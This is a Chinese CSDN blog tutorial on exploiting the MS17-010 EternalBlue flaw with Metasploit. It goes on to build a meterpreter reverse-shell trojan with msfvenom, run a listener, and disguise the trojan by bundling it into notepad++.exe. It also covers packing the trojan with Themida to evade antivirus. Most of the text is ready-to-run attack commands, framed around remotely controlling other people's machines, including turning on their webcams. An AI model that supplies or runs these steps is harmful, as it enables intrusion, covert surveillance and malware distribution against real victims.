kali自学教程1.msf攻击永恒之蓝及后门木马植入

本文详细描述了如何使用Metasploit框架中的模块进行MS17_010EternalBlue漏洞攻击,包括设置目标、选择payload、生成木马并实现远程监听的过程。还提及了如何创建免杀的远控木马以及使用Themida工具进行加壳以躲避检测。
摘要由CSDN通过智能技术生成

msf使用

msf攻击永恒之蓝利用2017年之前windows版本的漏洞,445端口。win10 11没有此漏洞。
完整命令:
sudo su
msfconsole
search ms17_010
use 0
set RHOSTS 192.168.186.131 //要攻击的目标ip
set lport 60000 //kali的监听端口
run

进入meterpreter,这是msf在攻击完成后得到目标受害机器的渗透权限(即攻击成功)
总结:metasploit攻击永恒之蓝全流程
1、使用模块
use exploit/windows/smb/ms17_010_eternablue
2、设置必选项
查看必选项【*required为yes的就是必选项】
show options
set RHOSTS 192.168.186.131
set payload windows/x64/meterpreter/reverse_tcp
[*payload是攻击载荷,就是攻击完成后想干啥,这里是想获取meterpreter]
[meterpreter是metasploit后渗透的神器]
set LHOST 192.168.186.128【kali的ip】
set LPORT 60000 [kali上要开的端口,1-65535随便选,但是不能被占用]
3、运行模块,完成攻击
run

木马植入以及远程监听

win7 和 永恒之蓝不是每台电脑都有。想远程控制别人?msfvenom生成远控木马了解一下
msfvenmon是用来生成后门的软件,在目标机上执行后门,在本地监听上线。【msfvenom在shell里使用,不是msfconsole终端】
windows可执行程序后门:
sudo su
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.186.128 lport=9999 -f exe -o demo.exe

注:-p: paylod
payload_name:系统/架构/作用/方式
payload设置
-f :format
exe:windows可执行文件
-o:代表输出为demo.exe文件
把生成的demo.exe文件放进想攻击的靶机中运行

接下来开启监听:
msfconsole
search ms17_010
use 0
use exploit/mutil/handler //使用模块
show options【填写payload LHOST LPORT】
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.186.128
set lport 9999
run
等靶机点开demo.exe文件,鱼就上钩了
进入meterpreter 可以在help查看命令,如打开摄像头,监控鼠标键盘,等等
webcam_stream打开摄像头

远控木马免杀过火绒

kali: 捆绑木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.186.128 lport=9999 -f exe -x notepad++.exe -o notepad++_miansha.exe
-x: 指的是待绑定的正常软件
注意要用x64位的。32位的会失效。32位的应用程序没办法植入64的木马

利用windows上的Themida工具进行加壳

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值